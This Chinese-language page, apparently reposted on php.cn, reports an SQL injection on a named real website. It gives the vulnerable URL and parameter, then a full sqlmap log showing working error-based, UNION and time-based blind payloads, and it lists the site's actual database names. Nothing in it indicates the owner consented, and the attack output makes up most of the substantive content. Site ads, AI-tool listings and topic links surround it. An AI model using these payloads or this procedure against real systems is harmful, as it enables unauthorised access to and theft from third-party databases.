0

0

我拉网主站一处sql注入_MySQL

php中文网

php中文网

发布时间:2016-06-01 13:12:51

|

1301人浏览过

|

来源于php中文网

原创

我拉网主站一处sql注入

注入点

网趣购物系统加强升级版
网趣购物系统加强升级版

新版本程序更新主要体现在:完美整合BBS论坛程序,用户只须注册一个帐号,即可全站通用!采用目前流行的Flash滚动切换广告 变换形式多样,受人喜爱!在原有提供的5种在线支付基础上增加北京云网支付!对留言本重新进行编排,加入留言验证码,后台有留言审核开关对购物系统的前台进行了一处安全更新。在原有文字友情链接基础上,增加LOGO友情链接功能强大的6种在线支付方式可选,自由切换。对新闻列表进行了调整,

下载
http://www.55.la/run/ding_banner.php?bid=21022
注入地址:http://www.55.la/run/ding_banner.php?bid=21022

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program

[*] starting at 02:04:07

[02:04:07] [INFO] using 'C:/Users/Administrator/Desktop/渗透工具/sqlmap GUI汉化
版/rar/output/www.55.la/session' as session file
[02:04:07] [INFO] testing connection to the target url
[02:04:07] [INFO] testing if the url is stable, wait a few seconds
[02:04:08] [INFO] url is stable
[02:04:08] [INFO] testing if GET parameter 'bid' is dynamic
[02:04:09] [INFO] confirming that GET parameter 'bid' is dynamic
[02:04:09] [INFO] GET parameter 'bid' is dynamic
[02:04:09] [INFO] heuristic test shows that GET parameter 'bid' might be injecta
ble (possible DBMS: MySQL)
[02:04:09] [INFO] testing sql injection on GET parameter 'bid'
[02:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:04:11] [INFO] GET parameter 'bid' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[02:04:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:04:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:04:21] [INFO] GET parameter 'bid' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[02:04:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:04:24] [INFO] target url appears to be UNION injectable with 1 columns
[02:04:25] [INFO] GET parameter 'bid' is 'MySQL UNION query (NULL) - 1 to 10 col
umns' injectable
GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 32 HTTP(s) requ
ests:
---
Place: GET
Parameter: bid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: bid=21022' AND (SELECT 3637 FROM(SELECT COUNT(*),CONCAT(0x3a6f636a3
a,(SELECT (CASE WHEN (3637=3637) THEN 1 ELSE 0 END)),0x3a7862753a,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uYVe'='uYVe

Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: bid=-1700' UNION SELECT CONCAT(0x3a6f636a3a,0x676e4261505364745265,
0x3a7862753a)# AND 'EXgA'='EXgA

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: bid=21022' AND SLEEP(5) AND 'xros'='xros
---

[02:04:27] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.24
back-end DBMS: MySQL 5.0
[02:04:27] [INFO] fetching database names
[02:04:30] [INFO] the SQL query used returns 5 entries
[02:04:30] [INFO] retrieved: "information_schema"
[02:04:37] [INFO] retrieved: "help55la"
[02:04:37] [INFO] retrieved: "test"
[02:04:37] [INFO] retrieved: "u_run55_la"
[02:04:37] [INFO] retrieved: "wstp8_com"
available databases [5]:
[*] help55la
[*] information_schema
[*] test
[*] u_run55_la
[*] wstp8_com

[02:04:37] [INFO] Fetched data logged to text files under 'C:/Users/Administrato
r/Desktop/渗透工具/sqlmap GUI汉化版/rar/output/www.55.la'

[*] shutting down at 02:04:37

本站声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
java连接字符串方法汇总
java连接字符串方法汇总

本专题整合了java连接字符串教程合集,阅读专题下面的文章了解更多详细操作。

3

2026.02.05

java中fail含义
java中fail含义

本专题整合了java中fail的含义、作用相关内容,阅读专题下面的文章了解更多详细内容。

6

2026.02.05

控制反转和依赖注入区别
控制反转和依赖注入区别

本专题整合了控制反转和依赖注入区别、解释、实现方法相关内容。阅读专题下面的文章了解更多详细教程。

6

2026.02.05

钉钉脑图插图教程合集
钉钉脑图插图教程合集

本专题整合了钉钉脑图怎么插入图片、钉钉脑图怎么用相关教程,阅读专题下面的文章了解更多详细内容。

8

2026.02.05

python截取字符串方法汇总
python截取字符串方法汇总

本专题整合了python截取字符串方法相关合集,阅读专题下面的文章了解更多详细内容。

2

2026.02.05

Java截取字符串方法合集
Java截取字符串方法合集

本专题整合了Java截取字符串方法汇总,阅读专题下面的文章了解更多详细操作教程。

1

2026.02.05

java 抽象方法
java 抽象方法

本专题整合了java抽象方法定义、作用教程等内容,阅读专题下面的文章了解更多详细内容。

2

2026.02.05

Eclipse创建jsp文件教程合集
Eclipse创建jsp文件教程合集

本专题整合了Eclipse创建jsp文件、创建jsp项目等等内容,阅读专题下面的文章了解更多详细教程。

18

2026.02.05

java 字符串转数字
java 字符串转数字

本专题整合了java如何字符串转数字相关内容,阅读专题下面的文章了解更多详细教程。

3

2026.02.05

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号